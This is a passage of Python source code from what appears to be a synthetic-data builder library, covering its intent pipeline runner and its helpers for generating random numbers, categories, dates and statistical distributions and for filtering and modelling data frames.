if str(method).startswith('get_'):
if column in _correlate + _frame_start + _frame_end:
continue
_get.append(column)
elif str(method).startswith('model_'):
_model.append(column)
elif str(method).startswith('correlate_'):
if column in _get:
_get.remove(column)
_correlate.append(column)
elif str(method).startswith('frame_'):
if column in _get:
_get.remove(column)
if str(method).startswith('frame_starter'):
_frame_start.append(column)
else:
_frame_end.append(column)
column_names = Commons.list_unique(_frame_start + _get + _model + _correlate + _frame_end)
for column in column_names:
level_key = self._pm.join(self._pm.KEY.intent_key, column)
for order in sorted(self._pm.get(level_key, {})):
for method, params in self._pm.get(self._pm.join(level_key, order), {}).items():
try:
if method in self.__dir__():
if simulate:
col_sim['column'].append(column)
col_sim['order'].append(order)
col_sim['method'].append(method)
continue
result = []
params.update(params.pop('kwargs', {}))
if isinstance(seed, int):
params.update({'seed': seed})
_ = params.pop('intent_creator', 'Unknown')
if str(method).startswith('get_'):
result = eval(f"self.{method}(size=size, save_intent=False, **params)",
globals(), locals())
elif str(method).startswith('correlate_'):
result = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
elif str(method).startswith('model_'):
canonical = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
continue
elif str(method).startswith('frame_starter'):
canonical = self._get_canonical(params.pop('canonical', canonical), deep_copy=False)
size = canonical.shape[0]
canonical = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
continue
elif str(method).startswith('frame_'):
canonical = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
continue
if 0 < size != len(result):
raise IndexError(f"The index size of '{column}' is '{len(result)}', "
f"should be {size}")
canonical[column] = result
except ValueError as ve:
raise ValueError(f"intent '{column}', order '{order}', method '{method}' failed with: {ve}")
except TypeError as te:
raise TypeError(f"intent '{column}', order '{order}', method '{method}' failed with: {te}")
if simulate:
return pd.DataFrame.from_dict(col_sim)
return canonical
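# Illustrative use of run_intent_pipeline (a sketch; 'builder' stands for a concrete subclass instance such as
# a SyntheticBuilder intent model with intent already captured in its property manager):
#   df = builder.run_intent_pipeline(canonical=1000, seed=31)            # build 1000 rows from the captured intent
#   plan = builder.run_intent_pipeline(canonical=1000, simulate=True)    # dry-run report of column/order/method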
def _get_number(self, from_value: [int, float]=None, to_value: [int, float]=None, relative_freq: list=None,
precision: int=None, ordered: str=None, at_most: int=None, size: int=None,
seed: int=None) -> list:
""" returns a number in the range from_value to to_value. if only to_value given from_value is zero
:param from_value: (signed) integer to start from
:param to_value: optional, (signed) integer the number sequence goes to but not include
:param relative_freq: a weighting pattern or probability that does not have to add to 1
:param precision: the precision of the returned number. if None then assumes int value else float
:param ordered: order the data ascending 'asc' or descending 'des', values accepted 'asc' or 'des'
:param at_most: the most times a selection should be chosen
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
"""
if not isinstance(from_value, (int, float)) and not isinstance(to_value, (int, float)):
raise ValueError(f"either a 'range_value' or a 'range_value' and 'to_value' must be provided")
if not isinstance(from_value, (float, int)):
from_value = 0
if not isinstance(to_value, (float, int)):
(from_value, to_value) = (0, from_value)
if to_value <= from_value:
raise ValueError("The number range must be a positive different, found to_value <= from_value")
at_most = 0 if not isinstance(at_most, int) else at_most
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
precision = 3 if not isinstance(precision, int) else precision
if precision == 0:
from_value = int(round(from_value, 0))
to_value = int(round(to_value, 0))
is_int = True if (isinstance(to_value, int) and isinstance(from_value, int)) else False
if is_int:
precision = 0
# build the distribution sizes
if isinstance(relative_freq, list) and len(relative_freq) > 1:
freq_dist_size = self._freq_dist_size(relative_freq=relative_freq, size=size, seed=_seed)
else:
freq_dist_size = [size]
# generate the numbers
rtn_list = []
generator = np.random.default_rng(seed=_seed)
dtype = int if is_int else float
bins = np.linspace(from_value, to_value, len(freq_dist_size) + 1, dtype=dtype)
for idx in np.arange(1, len(bins)):
low = bins[idx - 1]
high = bins[idx]
if low >= high:
continue
elif at_most > 0:
sample = []
for _ in np.arange(at_most, dtype=dtype):
count_size = freq_dist_size[idx - 1] * generator.integers(2, 4, size=1)[0]
sample += list(set(np.linspace(bins[idx - 1], bins[idx], num=count_size, dtype=dtype,
endpoint=False)))
if len(sample) < freq_dist_size[idx - 1]:
raise ValueError(f"The value range has insufficient samples to choose from when using at_most."
f"Try increasing the range of values to sample.")
rtn_list += list(generator.choice(sample, size=freq_dist_size[idx - 1], replace=False))
else:
if dtype == int:
rtn_list += generator.integers(low=low, high=high, size=freq_dist_size[idx - 1]).tolist()
else:
choice = generator.random(size=freq_dist_size[idx - 1], dtype=float)
choice = np.round(choice * (high-low)+low, precision).tolist()
# make sure the precision
choice = [high - 10**(-precision) if x >= high else x for x in choice]
rtn_list += choice
# order or shuffle the return list
if isinstance(ordered, str) and ordered.lower() in ['asc', 'des']:
rtn_list.sort(reverse=True if ordered.lower() == 'asc' else False)
else:
generator.shuffle(rtn_list)
return rtn_list
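# Illustrative calls (a sketch; normally reached through a concrete subclass rather than this abstract class):
#   self._get_number(from_value=0, to_value=10, size=5, seed=31)                 # five ints in [0, 10)
#   self._get_number(0.0, 1.0, precision=2, relative_freq=[1, 3], size=100)      # floats skewed to the upper half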
def _get_category(self, selection: list, relative_freq: list=None, size: int=None, at_most: int=None,
seed: int=None) -> list:
""" returns a category from a list. Of particular not is the at_least parameter that allows you to
control the number of times a selection can be chosen.
:param selection: a list of items to select from
:param relative_freq: a weighting pattern that does not have to add to 1
:param size: an optional size of the return. default to 1
:param at_most: the most times a selection should be chosen
:param seed: a seed value for the random function: default to None
:return: an item or list of items chosen from the list
"""
if not isinstance(selection, list) or len(selection) == 0:
return [None]*size
_seed = self._seed() if seed is None else seed
select_index = self._get_number(len(selection), relative_freq=relative_freq, at_most=at_most, size=size,
seed=_seed)
rtn_list = [selection[i] for i in select_index]
return list(rtn_list)
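# Illustrative call (a sketch; the selection values and weights are arbitrary):
#   self._get_category(selection=['M', 'F', 'U'], relative_freq=[6, 5, 1], size=100, seed=31)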
def _get_datetime(self, start: Any, until: Any, relative_freq: list=None, at_most: int=None, ordered: str=None,
date_format: str=None, as_num: bool=None, ignore_time: bool=None, size: int=None,
seed: int=None, day_first: bool=None, year_first: bool=None) -> list:
""" returns a random date between two date and/or times. weighted patterns can be applied to the overall date
range.
if a signed 'int' type is passed to the start and/or until dates, the inferred date will be the current date
time with the integer being the offset from the current date time in 'days'.
if a dictionary of time delta name values is passed this is treated as a time delta from the start time.
for example if start = 0, until = {days=1, hours=3} the date range will be between now and 1 days and 3 hours
Note: If no patterns are set this will return a linearly random number between the range boundaries.
:param start: the start boundary of the date range can be str, datetime, pd.datetime, pd.Timestamp or int
:param until: up until boundary of the date range can be str, datetime, pd.datetime, pd.Timestamp, pd.delta, int
:param relative_freq: (optional) A pattern across the whole date range.
:param at_most: the most times a selection should be chosen
:param ordered: order the data ascending 'asc' or descending 'des', values accepted 'asc' or 'des'
:param ignore_time: ignore time elements and only select from Year, Month, Day elements. Default is False
:param date_format: the string format of the date to be returned. if not set then pd.Timestamp returned
:param as_num: returns a list of Matplotlib date values as a float. Default is False
:param size: the size of the sample to return. Default to 1
:param seed: a seed value for the random function: default to None
:param year_first: specifies if to parse with the year first
If True parses dates with the year first, eg 10/11/12 is parsed as 2010-11-12.
If both day_first and year_first are True, year_first takes precedence (same as dateutil).
:param day_first: specifies if to parse with the day first
If True, parses dates with the day first, eg %d-%m-%Y.
If False, defaults to the preferred convention, normally %m-%d-%Y (but not strict)
:return: a date or size of dates in the format given.
"""
# pre check
if start is None or until is None:
raise ValueError("The start or until parameters cannot be of NoneType")
# Code block for intent
as_num = False if not isinstance(as_num, bool) else as_num
ignore_time = False if not isinstance(ignore_time, bool) else ignore_time
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
if isinstance(start, int):
start = (pd.Timestamp.now() + pd.Timedelta(days=start))
if isinstance(until, int):
until = (pd.Timestamp.now() + pd.Timedelta(days=until))
if isinstance(until, dict):
until = (start + pd.Timedelta(**until))
if start == until:
rtn_list = [self._convert_date2value(start, day_first=day_first, year_first=year_first)[0]] * size
else:
_dt_start = self._convert_date2value(start, day_first=day_first, year_first=year_first)[0]
_dt_until = self._convert_date2value(until, day_first=day_first, year_first=year_first)[0]
precision = 15
if ignore_time:
_dt_start = int(_dt_start)
_dt_until = int(_dt_until)
precision = 0
rtn_list = self._get_number(from_value=_dt_start, to_value=_dt_until, relative_freq=relative_freq,
at_most=at_most, ordered=ordered, precision=precision, size=size, seed=seed)
if not as_num:
rtn_list = mdates.num2date(rtn_list)
if isinstance(date_format, str):
rtn_list = pd.Series(rtn_list).dt.strftime(date_format).to_list()
else:
rtn_list = pd.Series(rtn_list).dt.tz_convert(None).to_list()
return rtn_list
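# Illustrative call (a sketch): dates across the last seven days relative to now, returned as formatted strings
#   self._get_datetime(start=-7, until=0, date_format='%Y-%m-%d', ignore_time=True, size=10, seed=31)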
def _get_intervals(self, intervals: list, relative_freq: list=None, precision: int=None, size: int=None,
seed: int=None) -> list:
""" returns a number based on a list selection of tuple(lower, upper) interval
:param intervals: a list of unique tuple pairs representing the interval lower and upper boundaries
:param relative_freq: a weighting pattern or probability that does not have to add to 1
:param precision: the precision of the returned number. if None then assumes int value else float
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
:return: a random number
"""
# Code block for intent
size = 1 if size is None else size
if not isinstance(precision, int):
precision = 0 if all(isinstance(v[0], int) and isinstance(v[1], int) for v in intervals) else 3
_seed = self._seed() if seed is None else seed
if not all(isinstance(value, tuple) for value in intervals):
raise ValueError("The intervals list must be a list of tuples")
interval_list = self._get_category(selection=intervals, relative_freq=relative_freq, size=size, seed=_seed)
interval_counts = pd.Series(interval_list, dtype='object').value_counts()
rtn_list = []
for index in interval_counts.index:
size = interval_counts[index]
if size == 0:
continue
if len(index) == 2:
(lower, upper) = index
if index == 0:
closed = 'both'
else:
closed = 'right'
else:
(lower, upper, closed) = index
if lower == upper:
rtn_list += [round(lower, precision)] * size
continue
if precision == 0:
margin = 1
else:
margin = 10**(((-1)*precision)-1)
if str.lower(closed) == 'neither':
lower += margin
upper -= margin
elif str.lower(closed) == 'right':
lower += margin
elif str.lower(closed) == 'both':
upper += margin
# correct adjustments
if lower >= upper:
upper = lower + margin
rtn_list += self._get_number(lower, upper, precision=precision, size=size, seed=_seed)
np.random.default_rng(seed=_seed).shuffle(rtn_list)
return rtn_list
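# Illustrative call (a sketch; the interval bands and weights are arbitrary):
#   self._get_intervals(intervals=[(0, 50), (50, 200), (200, 1000)], relative_freq=[5, 3, 1],
#                       precision=2, size=100, seed=31)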
def _get_dist_normal(self, mean: float, std: float, size: int=None, seed: int=None) -> list:
"""A normal (Gaussian) continuous random distribution.
:param mean: The mean (“centre”) of the distribution.
:param std: The standard deviation (jitter or “width”) of the distribution. Must be >= 0
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.normal(loc=mean, scale=std, size=size))
return rtn_list
def _get_dist_logistic(self, mean: float, std: float, size: int=None, seed: int=None) -> list:
"""A logistic continuous random distribution.
:param mean: The mean (“centre”) of the distribution.
:param std: The standard deviation (jitter or “width”) of the distribution. Must be >= 0
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.logistic(loc=mean, scale=std, size=size))
return rtn_list
def _get_dist_exponential(self, scale: [int, float], size: int=None, seed: int=None) -> list:
"""An exponential continuous random distribution.
:param scale: The scale of the distribution.
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.exponential(scale=scale, size=size))
return rtn_list
def _get_dist_gumbel(self, mean: float, std: float, size: int=None, seed: int=None) -> list:
"""An gumbel continuous random distribution.
The Gumbel (or Smallest Extreme Value (SEV) or the Smallest Extreme Value Type I) distribution is one of
a class of Generalized Extreme Value (GEV) distributions used in modeling extreme value problems.
The Gumbel is a special case of the Extreme Value Type I distribution for maximums from distributions
with “exponential-like” tails.
:param mean: The mean (“centre”) of the distribution.
:param std: The standard deviation (jitter or “width”) of the distribution. Must be >= 0
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.gumbel(loc=mean, scale=std, size=size))
return rtn_list
def _get_dist_binomial(self, trials: int, probability: float, size: int=None, seed: int=None) -> list:
"""A binomial discrete random distribution. The Binomial Distribution represents the number of
successes and failures in n independent Bernoulli trials for some given value of n
:param trials: the number of trials to attempt, must be >= 0.
:param probability: the probability distribution, >= 0 and <=1.
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.binomial(n=trials, p=probability, size=size))
return rtn_list
def _get_dist_poisson(self, interval: float, size: int=None, seed: int=None) -> list:
"""A Poisson discrete random distribution.
The Poisson distribution
.. math:: f(k; \lambda)=\frac{\lambda^k e^{-\lambda}}{k!}
For events with an expected separation :math:`\lambda` the Poisson
distribution :math:`f(k; \lambda)` describes the probability of
:math:`k` events occurring within the observed
interval :math:`\lambda`.
Because the output is limited to the range of the C int64 type, a
ValueError is raised when `lam` is within 10 sigma of the maximum
representable value.
:param interval: Expectation of interval, must be >= 0.
:param size: the size of the sample.
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.poisson(lam=interval, size=size))
return rtn_list
def _get_dist_bernoulli(self, probability: float, size: int=None, seed: int=None) -> list:
"""A Bernoulli discrete random distribution using scipy
:param probability: the probability occurrence
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
rtn_list = list(stats.bernoulli.rvs(p=probability, size=size, random_state=_seed))
return rtn_list
def _get_dist_bounded_normal(self, mean: float, std: float, lower: float, upper: float, precision: int=None,
size: int=None, seed: int=None) -> list:
"""A bounded normal continuous random distribution.
:param mean: the mean of the distribution
:param std: the standard deviation
:param lower: the lower limit of the distribution
:param upper: the upper limit of the distribution
:param precision: the precision of the returned number. if None then assumes int value else float
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
precision = precision if isinstance(precision, int) else 3
_seed = self._seed() if seed is None else seed
rtn_list = stats.truncnorm((lower-mean)/std, (upper-mean)/std, loc=mean, scale=std).rvs(size).round(precision)
return rtn_list
def _get_distribution(self, distribution: str, package: str=None, precision: int=None, size: int=None,
seed: int=None, **kwargs) -> list:
"""returns a number based the distribution type.
:param distribution: The string name of the distribution function from numpy random Generator class
:param package: (optional) The name of the package to use, options are 'numpy' (default) and 'scipy'.
:param precision: (optional) the precision of the returned number
:param size: (optional) the size of the sample
:param seed: (optional) a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
precision = 3 if precision is None else precision
if isinstance(package, str) and package == 'scipy':
rtn_list = eval(f"stats.{distribution}.rvs(size=size, random_state=_seed, **kwargs)", globals(), locals())
else:
generator = np.random.default_rng(seed=_seed)
rtn_list = eval(f"generator.{distribution}(size=size, **kwargs)", globals(), locals())
rtn_list = list(rtn_list.round(precision))
return rtn_list
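# Illustrative calls (a sketch): dispatch by distribution name to numpy's Generator or to scipy.stats
#   self._get_distribution(distribution='beta', a=2, b=5, size=100, seed=31)            # numpy generator.beta
#   self._get_distribution(distribution='expon', package='scipy', scale=2.0, size=100)  # scipy stats.expon.rvs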
def _get_selection(self, canonical: Any, column_header: str, relative_freq: list=None, sample_size: int=None,
selection_size: int=None, size: int=None, at_most: bool=None, shuffle: bool=None,
seed: int=None) -> list:
""" returns a random list of values where the selection of those values is taken from a connector source.
:param canonical: a pd.DataFrame as the reference dataframe
:param column_header: the name of the column header to correlate
:param relative_freq: (optional) a weighting pattern of the final selection
:param selection_size: (optional) the selection to take from the sample size, normally used with shuffle
:param sample_size: (optional) the size of the sample to take from the reference file
:param at_most: (optional) the most times a selection should be chosen
:param shuffle: (optional) if the selection should be shuffled before selection. Default is true
:param size: (optional) size of the return. default to 1
:param seed: (optional) a seed value for the random function: default to None
:return: list
The canonical is normally a connector contract str reference or a set of parameter instructions on how to
generate a pd.Dataframe but can be a pd.DataFrame. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
"""
canonical = self._get_canonical(canonical)
_seed = self._seed() if seed is None else seed
if isinstance(canonical, dict):
canonical = pd.DataFrame.from_dict(data=canonical)
if column_header not in canonical.columns:
raise ValueError(f"The column '{column_header}' not found in the canonical")
_values = canonical[column_header].iloc[:sample_size]
if isinstance(selection_size, float) and shuffle:
_values = _values.sample(frac=1, random_state=_seed).reset_index(drop=True)
if isinstance(selection_size, int) and 0 < selection_size < _values.size:
_values = _values.iloc[:selection_size]
return self._get_category(selection=_values.to_list(), relative_freq=relative_freq, size=size, at_most=at_most,
seed=_seed)
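# Illustrative call (a sketch; 'df_ref' and its 'city' column are assumed reference data):
#   self._get_selection(canonical=df_ref, column_header='city', sample_size=500, size=100, seed=31)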
def _frame_starter(self, canonical: Any, selection: list=None, headers: [str, list]=None, drop: bool=None,
dtype: [str, list]=None, exclude: bool=None, regex: [str, list]=None, re_ignore_case: bool=None,
rename_map: dict=None, default_size: int=None, seed: int=None) -> pd.DataFrame:
""" Selects rows and/or columns changing the shape of the DatFrame. This is always run last in a pipeline
Rows are filtered before the column filter so columns can be referenced even though they might not be included
the final column list.
:param canonical: a pd.DataFrame as the reference dataframe
:param selection: a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param headers: a list of headers to drop or filter on type
:param drop: to drop or not drop the headers
:param dtype: the column types to include or exclusive. Default None else int, float, bool, object, 'number'
:param exclude: to exclude or include the dtypes
:param regex: a regular expression to search the headers. example '^((?!_amt).)*$' excludes '_amt' columns
:param re_ignore_case: true if the regex should ignore case. Default is False
:param rename_map: a from: to dictionary of headers to rename
:param default_size: if the canonical fails return an empty dataframe with the default index size
:param seed: this is a place holder, here for compatibility across methods
:return: pd.DataFrame
The starter is a pd.DataFrame, a pd.Series or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensures the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
"""
canonical = self._get_canonical(canonical, size=default_size)
# not used but in place for method consistency
_seed = self._seed() if seed is None else seed
if isinstance(selection, list):
selection = deepcopy(selection)
# run the select logic
select_idx = self._selection_index(canonical=canonical, selection=selection)
canonical = canonical.iloc[select_idx].reset_index(drop=True)
drop = drop if isinstance(drop, bool) else False
exclude = exclude if isinstance(exclude, bool) else False
re_ignore_case = re_ignore_case if isinstance(re_ignore_case, bool) else False
rtn_frame = Commons.filter_columns(canonical, headers=headers, drop=drop, dtype=dtype, exclude=exclude,
regex=regex, re_ignore_case=re_ignore_case)
if isinstance(rename_map, dict):
rtn_frame.rename(mapper=rename_map, axis='columns', inplace=True)
return rtn_frame
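# Illustrative call (a sketch; 'df' and its column names are assumptions, select2dict is the helper method
# referenced in the docstring):
#   selection = [self.select2dict(column='age', condition='>=18')]
#   self._frame_starter(canonical=df, selection=selection, headers=['age', 'gender'],
#                       rename_map={'gender': 'sex'})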
def _frame_selection(self, canonical: Any, selection: list=None, headers: [str, list]=None,
drop: bool=None, dtype: [str, list]=None, exclude: bool=None, regex: [str, list]=None,
re_ignore_case: bool=None, seed: int=None) -> pd.DataFrame:
""" This method always runs at the start of the pipeline, taking a direct or generated pd.DataFrame,
see context notes below, as the foundation canonical of all subsequent steps of the pipeline.
:param canonical: a direct or generated pd.DataFrame. see context notes below
:param selection: a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param headers: a list of headers to drop or filter on type
:param drop: to drop or not drop the headers
:param dtype: the column types to include or exclusive. Default None else int, float, bool, object, 'number'
:param exclude: to exclude or include the dtypes
:param regex: a regular expression to search the headers. example '^((?!_amt).)*$' excludes '_amt' columns
:param re_ignore_case: true if the regex should ignore case. Default is False
:param seed: this is a place holder, here for compatibility across methods
:return: pd.DataFrame
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensures the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
"""
return self._frame_starter(canonical=canonical, selection=selection, headers=headers, drop=drop, dtype=dtype,
exclude=exclude, regex=regex, re_ignore_case=re_ignore_case, seed=seed)
def _model_custom(self, canonical: Any, code_str: str, seed: int=None, **kwargs):
""" Commonly used for custom methods, takes code string that when executed changes the the canonical returning
the modified canonical. If the method passes returns a pd.Dataframe this will be returned else the assumption is
the canonical has been changed inplace and thus the modified canonical will be returned
When referencing the canonical in the code_str it should be referenced either by use parameter label 'canonical'
or the short cut '@' symbol. kwargs can also be passed into the code string but must be preceded by a '$' symbol
for example:
assume canonical['gender'] = ['M', 'F', 'U']
code_str ='''
\n@['new_gender'] = [True if x in $value else False for x in @[$header]]
\n@['value'] = [4, 5, 6]
'''
where kwargs are header="'gender'" and value=['M', 'F']
:param canonical: a pd.DataFrame as the reference dataframe
:param code_str: an action on those column values. to reference the canonical use '@'
:param seed: (optional) a seed value for the random function: default to None
:param kwargs: a set of kwargs to include in any executable function
:return: a list (optionally a pd.DataFrame)
"""
canonical = self._get_canonical(canonical)
_seed = seed if isinstance(seed, int) else self._seed()
local_kwargs = locals()
for k, v in local_kwargs.pop('kwargs', {}).items():
local_kwargs.update({k: v})
code_str = code_str.replace(f'${k}', str(v))
code_str = code_str.replace('@', 'canonical')
df = exec(code_str, globals(), local_kwargs)
if df is None:
return canonical
return df
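# Illustrative call (a sketch) mirroring the '@' canonical reference and '$' kwarg substitution in the docstring;
# 'df' and its 'age' column are assumptions:
#   code = "@['is_adult'] = @['age'] >= $limit"
#   self._model_custom(canonical=df, code_str=code, limit=18)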
def _model_iterator(self, canonical: Any, marker_col: str=None, starting_frame: str=None, selection: list=None,
default_action: dict=None, iteration_actions: dict=None, iter_start: int=None,
iter_stop: int=None, seed: int=None) -> pd.DataFrame:
""" This method allows one to model repeating data subset that has some form of action applied per iteration.
The optional marker column must be included in order to apply actions or apply an iteration marker
An example of use might be a recommender generator where a cohort of unique users need to be selected, for
different recommendation strategies but users can be repeated across recommendation strategy
:param canonical: a pd.DataFrame as the reference dataframe
:param marker_col: (optional) the marker column name for the action outcome. default is to not include
:param starting_frame: (optional) a str referencing an existing connector contract name as the base DataFrame
:param selection: (optional) a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param default_action: (optional) a default action to take on all iterations. defaults to iteration value
:param iteration_actions: (optional) a dictionary of actions where the key is a specific iteration
:param iter_start: (optional) the start value of the range iteration default is 0
:param iter_stop: (optional) the stop value of the range iteration default is start iteration + 1
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: pd.DataFrame
The starting_frame can be a pd.DataFrame, a pd.Series, int or list, a connector contract str reference or a
set of parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensures the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
that executes a intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
{'method': 'get_category', selection: ['M', 'F', 'U']}
This same action using the helper method would look like:
inst.action2dict(method='get_category', selection=['M', 'F', 'U'])
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical)
rtn_frame = self._get_canonical(starting_frame)
_seed = self._seed() if seed is None else seed
iter_start = iter_start if isinstance(iter_start, int) else 0
iter_stop = iter_stop if isinstance(iter_stop, int) and iter_stop > iter_start else iter_start + 1
default_action = default_action if isinstance(default_action, dict) else 0
iteration_actions = iteration_actions if isinstance(iteration_actions, dict) else {}
for counter in range(iter_start, iter_stop):
df_count = canonical.copy()
# selection
df_count = self._frame_selection(df_count, selection=selection, seed=_seed)
# actions
if isinstance(marker_col, str):
if counter in iteration_actions.keys():
_action = iteration_actions.get(counter, None)
df_count[marker_col] = self._apply_action(df_count, action=_action, seed=_seed)
else:
default_action = default_action if isinstance(default_action, dict) else counter
df_count[marker_col] = self._apply_action(df_count, action=default_action, seed=_seed)
rtn_frame = pd.concat([rtn_frame, df_count], ignore_index=True)
return rtn_frame
def _model_group(self, canonical: Any, headers: [str, list], group_by: [str, list], aggregator: str=None,
list_choice: int=None, list_max: int=None, drop_group_by: bool=False, seed: int=None,
include_weighting: bool=False, freq_precision: int=None, remove_weighting_zeros: bool=False,
remove_aggregated: bool=False) -> pd.DataFrame:
""" returns the full column values directly from another connector data source. in addition the the
standard groupby aggregators there is also 'list' and 'set' that returns an aggregated list or set.
These can be using in conjunction with 'list_choice' and 'list_size' allows control of the return values.
if list_max is set to 1 then a single value is returned rather than a list of size 1.
:param canonical: a pd.DataFrame as the reference dataframe
:param headers: the column headers to apply the aggregation too
:param group_by: the column headers to group by
:param aggregator: (optional) the aggregator as a function of Pandas DataFrame 'groupby' or 'list' or 'set'
:param list_choice: (optional) used in conjunction with list or set aggregator to return a random n choice
:param list_max: (optional) used in conjunction with list or set aggregator restricts the list to a n size
:param drop_group_by: (optional) drops the group by headers
:param include_weighting: (optional) include a percentage weighting column for each
:param freq_precision: (optional) a precision for the relative_freq values
